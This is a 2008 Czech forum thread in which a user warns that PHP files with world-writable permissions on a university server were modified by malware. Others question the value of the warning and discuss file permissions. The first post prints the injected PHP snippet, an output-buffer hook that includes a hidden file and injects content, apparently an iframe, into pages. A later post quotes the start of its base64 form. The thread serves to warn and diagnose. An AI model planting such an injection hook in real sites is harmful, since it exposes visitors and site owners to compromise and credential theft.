Diskuse JPW: php / server virus - upozorneni

	Autor	Zpráva
	peta Profil	#1 · Zasláno: 28. 11. 2008, 08:43:35 · Upravil/a: peta Odpovědět Citovat Na nasem serveru se spustil nejaky program, asi, ktery prepisuje vsechny PHP, ktera maji prava zapisu rwx rWx rWx (jedno z tech velkych W) Zatim to zkoumam, upozornuji vsak na to. Prida to php kod, ktery dekoduje JS kod pro vlozeni iframu. Zrejme to bude prace jednoho z tech lidi ,co se pltal v sekci JS, jak roztahnout okno na celou sirku, protoze to vyuziva presne ten princip a vim, jak jsou nasinci sikovni :) Blizsi informace Modifikace php nastala 26.11.2008 20:34 vlozi to php script: if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS[' sh_no']=1;if(file_exists('/var/www/html/newsys/aliases/ubk/curras/ESP/ cmsimple/languages/mdl_utf.php')){include_once('/var/www/html/newsys/a liases/ubk/curras/ESP/cmsimple/languages/mdl_utf.php');if(function_exi sts('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode') ){function gzdecode($d){$f=ord(substr($d,3,1));$h=10;$e=0;if($f&4){$e=unpack('v', substr($d,10,2));$e=$e[1];$h+=2+$e;}if($f&8){$h=strpos($d,chr(0),$h)+1 ;}if($f&16){$h=strpos($d,chr(0),$h)+1;}if($f&2){$h+=2;}$u=gzinflate(su bstr($d,$h));if($u===FALSE){$u=$d;}return $u;}}function dgobh($b){Header('Content-Encoding: none');$c=gzdecode($b);if(preg_match('/\]*\>)/si','$1'.gml(),$c);}else {return gml().$c;}}ob_start('dgobh');}}} Cili to spousti nejaky PHP z naseho adresare, kam nemam pristup, zavirovany program je asi PHP CMS made simple, sekce languages.
	ninja Profil	#2 · Zasláno: 28. 11. 2008, 09:56:14 Odpovědět Citovat peta: a vas server je co? Nejaky hosting?
	peta Profil	#3 · Zasláno: 28. 11. 2008, 10:35:37 Odpovědět Citovat Po prozkoumani toho includovaneho jsem zjistil, ze to dela vse mozne i nemozne. Zjistuje to hesla, adresy programu, nazvy souboru, typ serveru... Pouziva to sice kodovani typu: FE0323A9039ADD2978BF5B49550572C7C(); $R3CB9CDAED257453CFA56B9EF81B44C57 = 1; } Ale to na mne neplati, ze :) Jako jednoduchou pomoc doporucuji prenastavit prava na rwx r.x r.x a do napadnuteho souboru, ktery to includuje napsat nejakou hlasku ve smyslu: Pokud vidite tento text napiste: spravce aplikace zde = mail uzivatel = pokuste se vyhledat kontakt na spravce a oznemte mu to. ninja To je proste server, zalozeny na linuxu. Ber to jako oznameni. Treba je to stary virus, ale clovek nikdy nevi. Zachranit, co se da, doporucit zmenit hesla a opravneni souboru.
	Mike8748 Profil	#4 · Zasláno: 28. 11. 2008, 11:17:07 Odpovědět Citovat peta nejak nechapu proc nam to vlastne oznamujes. pokud tohle beres jako upozorneni na existenci "viru" tak by bylo dobry poskytnout nejaky fakticky informace coz si v podstate neudelal >> nastavit prava na rwx r.x r.x kdyz uz tak rw.r..r.. nevidim duvod proc by ty skripty meli mit pravo na vykonavani (kdyz jsou podle tebe tak nebezpecny)
	peta Profil	#5 · Zasláno: 28. 11. 2008, 11:47:43 Odpovědět Citovat Mike8748 :))) zas chytrak ala chamurapi. Rekni, co bys rad vedel? Napsal jsem zhruba vsechno dulezite, co se mi podarilo s mymi pravy na serveru vystourat. Cili * ze se tam nejak vlozil php kod * ktery spousti php kod ulozeny v nejakem adresari (jak se tam dostal nebo jestli to tam nahral uzivatel-spravce adresare, to nevim) * a ten druhej php kod odchytava ruzna hesla * kdy se udalost stala, 26.11. kolem 20:00, podle casu modifikace mych php souboru * a ze se to stalo jen u typu PHP, ktery mel povolene prava W pro vsechny 3 skupiny * typ serveru linux, muzu rici, ze nedavno (rok zpet) nainstalovane nove verze php sql * maximalne muzu pridat cas PHP kodu, ktery to pripsalo base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl abys mohl pouzit linuxove hledani Podle toho se muze kazdy podivat u sebe a zkontrolovat, zda s tim nema tez problem. Vic informaci spis nemam.
	Medvídek Profil	#6 · Zasláno: 28. 11. 2008, 12:10:40 Odpovědět Citovat peta No prostě si nafackuj, neukládej si heslo k ftp k sobě do počítače a nelez na porno warez servery !
	Mastodont Profil	#7 · Zasláno: 28. 11. 2008, 12:21:21 Odpovědět Citovat peta Tady u nás pod oknem se právě vydělala kočka. To je zpráva s podobnou informační hodnotou jako ta tvoje.
	Mike8748 Profil	#8 · Zasláno: 28. 11. 2008, 12:45:34 Odpovědět Citovat peta pokud spravci serveru na slu umi aspon trosku svoji praci, tak pro ne nebude problem zjistit kdo z UBK vlastni/vytvoril danou slozku curras pripadne zminene podslozky a najit "vinika" jinak, jde o CMSimple, a ne o CMS Made Simple jelikoz to evidentne "napadlo" vice tvyh souboru tak by me zajimalo proc jim proboha nastavujes pravo zapisu? jeste k tomu pro vsechny 3 skupiny docela by me zajimalo co je obsahem toho iframu :) me to prijde jako ze si nejaky studentik trosku hral no ninja nejde o webhosting, ale server Slezske univerzity v Opave :)
	peta Profil	#9 · Zasláno: 28. 11. 2008, 12:49:48 · Upravil/a: peta Odpovědět Citovat Medvídek :) Vzhledem k tomu, co jsem napsal, ze s mymi pravy vic zjistit nemuzu, myslim, ze by pres me heslo mohl nekdo spustit progrem, ktery prepise soubory, do kterych nemam pravo zapisovat? :) Mastodont Tak to nahlas moderatorum, at to smazou. Mike8748 Jeste bych dodal, co jsem psal, k tem odrazkam... * zminena sifrovana cast do base64 se dekoduje jako, viz prvni zprava a z toho je mozna dulezita cesta, odkud se to includuje /var/www/html/newsys/aliases/ubk/curras/ESP/ cmsimple/languages/mdl_utf.php a domnivam se, ze zbytek toho scriptu, co provadi to odchytavani hesel je v programu cmsimple, coz by mohl byt cms-made-simple. Ted je otazka, jestli to nekdo nasoukal pres ten CMS nebo se naboural na server. To uz necham na nasich adminech, kteri maji vetsi prava. Uz jenom ziskat zdroj k tomu zavirovanemu mdl_utf.php jsem musel pres jednoho z nich. PS. Dokonce bych se domnival, ze to chce hlavne smazat ten clovek, ktery z toho muze mit prospech :)
	bohyn Profil	#10 · Zasláno: 28. 11. 2008, 12:58:49 Odpovědět Citovat peta „Vzhledem k tomu, co jsem napsal, ze s mymi pravy vic zjistit nemuzu, myslim, ze by pres me heslo mohl nekdo spustit progrem, ktery prepise soubory, do kterych nemam pravo zapisovat? :)“ Ty nemas pravo zapisu pres FTP ? „S. Dokonce bych se domnival, ze to chce hlavne smazat ten clovek, ktery z toho muze mit prospech :)“ Kdyz to dokazal zapsat tak to dokaze i odstranit
	peta Profil	#11 · Zasláno: 28. 11. 2008, 14:36:08 Odpovědět Citovat bohyn Polozim ti jednoduchou otazku. Co vis o linuxu? Protoze s tvych otazek mam pocit, ze se bavime o win. V linuxu je admin a uzivatele. Admin nastavuje prava, kam uzivatele muzou a kam uz ne. Tyto prava se vztahuji pro vsechn akce uzivatele, vcetne FTP. Cili, pokud se dostanu pres FTP do slozky /home/Peta muzu predpokladat, ze pokud mi to admin slesl nepovoli, pak pro mne slozka /var/www/html/newsys/aliases/ubk/curras/ESP/ neexistuje. Tim padem zadny PHP a zadny FTP zapis do neceho neexistujiciho nelze provest? Chci rici, ze nechapu tvuj dotaz 1 o FTP. 2 - nechapu vubec :) Ja mluvim o smazani tematu a ze o to predevsim bude usilovat autor viru a ten, co z toho ma prospech. Tim, ze na to brzo upozornuji mu marim praci a v dobe, kdy si to cte uz pulka lidi zmenila a uz si nestihl zcizit, co chtel.
		Časová prodleva: 15 let

0